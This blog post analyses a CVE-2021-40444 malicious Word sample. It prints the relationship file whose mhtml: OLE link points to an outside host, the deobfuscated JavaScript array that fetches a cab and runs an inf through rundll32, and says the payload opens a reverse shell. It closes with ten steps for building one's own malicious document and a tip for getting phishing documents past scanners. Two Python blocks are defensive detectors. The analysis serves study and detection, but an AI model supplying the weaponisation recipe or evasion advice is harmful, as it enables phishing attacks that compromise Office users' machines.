I’m writing this blog post with no technical background on this exploit, so I would like to share my experience with it. I saw a lot of people do a proof of concept, so I decided to do something different: I will get the exploit, then analyze it and go deeper into it. If you notice any mistake in my blog post, DM me on my Twitter account.
I hope I can do something useful. Enjoy reading.
Here is my test environment lab:
- Windows System
- Process Monitor
- Microsoft Office
- Python 3
Process Monitor will help us figure out what happens when we open the affected Word document.
Python 3 will help us start a SimpleHTTPServer; feel free to use whatever you want.
After setting up the environment, I will download the exploit sample from https://github.com/rfcxv/CVE-2021-40444-POC
Thanks so much, @rfcxv and @JAMESWT_MHT for uploading the samples.
After downloading the samples, I renamed the file.
I would like to start with dynamic analysis to figure out what happens behind the scenes. So I will start Process Monitor, then press CTRL+E to stop capturing events and CTRL+X to clear them.
Then I will set up a filter to capture only Microsoft Word events: press CTRL+L, set WINWORD.exe in the filter, and apply the changes.
Then let’s capture our Word events by pressing CTRL+E again and opening the Word document.
Here I will do some static analysis. I would like to start from the doc file, so let’s unpack the document by changing the file extension to .zip and extracting the file data.
When I went to check the files, I noticed two weird URLs in the relationship file.
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml" />
  <Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml" />
  <Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml" />
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml" />
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml" />
  <Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:http://hidusi.com/e8c76295a5f9acb7/side.html!x-usc:http://hidusi.com/e8c76295a5f9acb7/side.html" TargetMode="External" />
  <Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.wmf" />
  <Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpeg" />
</Relationships>
Relationship files normally contain references to internal/external resources such as fonts, themes, web settings, etc.
I found two external URLs referring to the hidusi.com domain, both inside the single oleObject relationship (rId6) marked TargetMode="External".
MHTML is a file extension for the web page archive format saved by Internet Explorer. The archived web page is an MHTML document. MHTML saves the web page content and incorporates external resources, such as images, applets, Flash animations and so on, into a single HTML document.
So I decided to add that domain name to my hosts file and start an HTTP server with Python.
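As an added example (not code from the post), here is the kind of check the "Note for Red Teamer" at the end of the post refers to, written in Python: it unpacks a .docx in memory, lists every relationship with TargetMode="External", flags mhtml:/x-usc: targets like the one above, and cross-references the relationship ID against OLEObject entries in document.xml. The sample document is constructed inline from the relationship shown above.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"

def scan_docx(docx_bytes):
    """Return (rId, Target, is_mhtml, used_by_oleobject) for every relationship
    in word/_rels/document.xml.rels that has TargetMode="External"."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        rels_xml = z.read("word/_rels/document.xml.rels")
        doc_xml = z.read("word/document.xml")
    # An OLEObject in document.xml points at its relationship through r:id="rIdN"
    ole_ids = set(re.findall(rb'<o:OLEObject[^>]*\br:id="([^"]+)"', doc_xml))
    findings = []
    for rel in ET.fromstring(rels_xml).iter(RELS_NS + "Relationship"):
        if rel.get("TargetMode") != "External":
            continue  # internal parts (styles, fonts, media) are the normal case
        rid, target = rel.get("Id", ""), rel.get("Target", "")
        low = target.lower()
        is_mhtml = low.startswith("mhtml:") or "!x-usc:" in low
        findings.append((rid, target, is_mhtml, rid.encode() in ole_ids))
    return findings

def is_suspicious(findings):
    """Flag the document if an external target uses mhtml:/x-usc: or backs an OLEObject."""
    return any(is_mhtml or ole for _, _, is_mhtml, ole in findings)

def build_sample_docx():
    """Constructed minimal .docx: the relationship from the post plus a matching OLEObject."""
    rels = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
            '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/'
            'relationships/styles" Target="styles.xml"/>'
            '<Relationship Id="rId6" Type="' + OLE_REL + '" Target="mhtml:http://hidusi.com/'
            'e8c76295a5f9acb7/side.html!x-usc:http://hidusi.com/e8c76295a5f9acb7/side.html" '
            'TargetMode="External"/></Relationships>')
    doc = ('<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
           'xmlns:o="urn:schemas-microsoft-com:office:office" '
           'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
           '<w:body><w:p><w:r><w:object><o:OLEObject Type="Link" r:id="rId6"/>'
           '</w:object></w:r></w:p></w:body></w:document>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/_rels/document.xml.rels", rels)
        z.writestr("word/document.xml", doc)
    return buf.getvalue()
```

Running `scan_docx(build_sample_docx())` on the constructed document reports rId6 as an mhtml target that is also referenced by an OLEObject, which is exactly the combination worth alerting on.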
Now let’s see what happens when I open the document again.
Okay, it goes to fetch the content of side.html, as I found in the relationship file. There is an ID for each relationship, so I can take the ID of that relationship and search the document.xml file to find more details on it.
And yes, I found an OLEObject for that ID, as expected.
A Word OLE (Object Linking and Embedding) object is used to make content created in one program available in a Word document. For example, users can insert an Excel worksheet in a Word document.
Both linked objects and embedded objects can be used between Word and other programs.
When I took a look into the cab file through WinRAR, I noticed an inf binary inside it, and it looks like there is an LFI vulnerability because there is ..\ before the file name. But okay, we’ll go deep into that later; for now let’s find out what the inf binary does.
I’ll use the file command, but as we know that command is on Linux, and I do not have bash or the Linux subsystem on my machine. Thanks so much to @nscaife for this awesome work: https://github.com/nscaife/file-windows/releases
After taking a look into that cab file in IDA I found the below:
- It creates a thread with CreateThread to return a reverse shell to the attacker.
So my next step will be analyzing that HTML file.
I found JS in the HTML, but sadly it was obfuscated.
So I will dig more to figure out the goal of that JS. To do that I will need to do some dynamic debugging, and again I can do this through VS Code; I’ll select Edge for debugging because the HTML supports IE11.
When I looked at the first array I noticed some things that look like it tries to send a GET request to fetch the cab file, but let’s go deep.
I will set a breakpoint at this point because I noticed it does some push and shift on the first array, so I decided to discover more about it.
So all I’ll do is set a breakpoint at this line, then run my debugger on Edge and keep my eye on the array.
And yes, as expected it takes the first value of the array and pushes it back onto the end. Now, if you noticed, there is an if condition before it modifies the array; I think this condition is just there to stop the push on a specific value, so I’ll move my breakpoint to the break function to check the array after that modification.
Fine, now our new array is
['#version=5,0,0,0', 'ssi', 'iframe', '748708rfmUTk', 'documentElement', 'lFile', 'location', '159708hBVRtu', 'a/Lo', 'Script', 'document', 'call', 'contentWindow', 'emp', 'Document', 'Obj', 'prototype', 'lfi', 'bject', 'send', 'appendChild', 'Low/championship.inf', 'htmlfile', '115924pLbIpw', 'GET', 'p/championship.inf', '1109sMoXXX', './../A', 'htm', 'l/T', 'cal/', '1wzQpCO', 'ect', 'w/championship.inf', '522415dmiRUA', 'http://127.0.0.1/test.cab', '88320wWglcB', 'XMLHttpRequest', 'championship.inf', 'Act', 'D:edbc374c-5730-432a-b5b8-de94f0b57217', 'open', '<bo', 'HTMLElement', '/..', 'veXO', '102FePAWC', '123', '365952KMsRQT', 'tiveX', '/Lo', './../../', 'contentDocument', 'ppD', 'Dat', 'close', 'Acti', 'removeChild', 'mlF', 'write', './A', 'ata/', 'ile', '../', 'body', 'setAttribute']
If you want to count how many times it goes to the else branch, simply make a flag variable with value 0, add 1 each time it goes into the else branch, and log it before the break.
If you did that, you can find the count easily in the console section.
Then I decided to take a fast look at all the variables, so basically I typed var in the search and found 15 variables; minus 1 variable for our flag = 14 variables. It didn’t take much time to notice the following:
- There are 3 variables with only one letter (_0x371a71, _0xd7e33d, _0x487bfa).
- There are some variables concatenated from the array and other variables.
So now I decided to create a script that takes the obfuscated file and replaces these variables with their values. Wait, what!!!?
I’m too lazy right now, so I won’t do that now :joy:
All I will do is replace them myself.
Dynamic Analysis again
So now we know that the HTML file will go and download the cab file.
Then let’s start our Python HTTP server and see what happens.
At the current moment, I do not know how this file is used.
So to get this answer let’s capture the Word events and see what happens in the background.
Here I’ll filter on the inf binary to find where it is used.
And yes, I found it running through rundll32.exe.
WHAT WAIT A MINUTE !!!!!!!!!!!!
tbh idk why sometimes rundll32.exe cannot find championship.inf, while if you go to the path you will find it :(
If we take a close look into any of these events we will find the full command line.
And if we go to C:\Users\PwnLab\AppData\Local\Temp we will find
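As an added example (not the post’s own code), here is the Process Monitor observation above turned into a small detection heuristic over a Procmon CSV export: it flags Process Create events where WINWORD.EXE launches rundll32.exe with an argument under the user’s AppData\Local\Temp folder, while leaving ordinary rundll32 launches alone. The CSV rows, PIDs and command line are constructed for this example, not captured output.

```python
import csv
import io
import re

TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
DETAIL_RE = re.compile(r"PID:\s*(\d+),\s*Command line:\s*(.*)$")

def flag_rundll32_from_word(csv_text):
    """Return (child_pid, command_line) for each Process Create event in which
    WINWORD.EXE started rundll32.exe with an argument under AppData\\Local\\Temp."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Operation"] != "Process Create" or row["Process Name"].upper() != "WINWORD.EXE":
            continue
        m = DETAIL_RE.search(row["Detail"])
        if not m:
            continue
        child_pid, cmd = m.group(1), m.group(2)
        # rundll32 on its own is common; rundll32 loading something from Temp is the signal
        if "rundll32" in cmd.lower() and TEMP_RE.search(cmd):
            hits.append((child_pid, cmd))
    return hits

# Constructed sample in Process Monitor's CSV export layout (not a real capture).
SAMPLE_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"1:02:03.1","WINWORD.EXE","4120","CreateFile","C:\Users\PwnLab\AppData\Local\Temp\Low\championship.inf","SUCCESS","Desired Access: Generic Read"
"1:02:03.2","WINWORD.EXE","4120","Process Create","C:\Windows\System32\rundll32.exe","SUCCESS","PID: 5188, Command line: rundll32.exe ""C:\Users\PwnLab\AppData\Local\Temp\Low\championship.inf"",123"
"1:02:04.0","WINWORD.EXE","4120","Process Create","C:\Windows\System32\rundll32.exe","SUCCESS","PID: 5200, Command line: rundll32.exe shell32.dll,Control_RunDLL"
'''

if __name__ == "__main__":
    for pid, cmd in flag_rundll32_from_word(SAMPLE_CSV):
        print(f"suspicious rundll32 launch from Word (PID {pid}): {cmd}")
```

Only the second row is reported; the CreateFile event and the benign rundll32 launch without a Temp path are ignored.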
I lost my energy after all I did, and I want to publish this blog post before going to sleep, so I will give a few steps on how to create your own malicious document.
- Download Office.
- Create a normal Word document.
- Add a bitmap image.
- Unpack the document.
- Modify the document.xml.rels to add your external relationship.
- Modify the document.xml to add an OLEObject with the same relationship ID.
- Pack the document again.
- Create your own DLL.
- Convert the DLL to a cab.
- Modify the HTML file to add your cab location and inf file.
Note for Red Teamers
If you are planning to use this CVE in your phishing engagement, take care, because many solutions check the relationship files, and if they find any kind of external relationship they will take that URL and open it to check whether it has malicious data or not. So watch out :)
If you have feedback, please go ahead and DM me on Twitter. See you in the next blog post.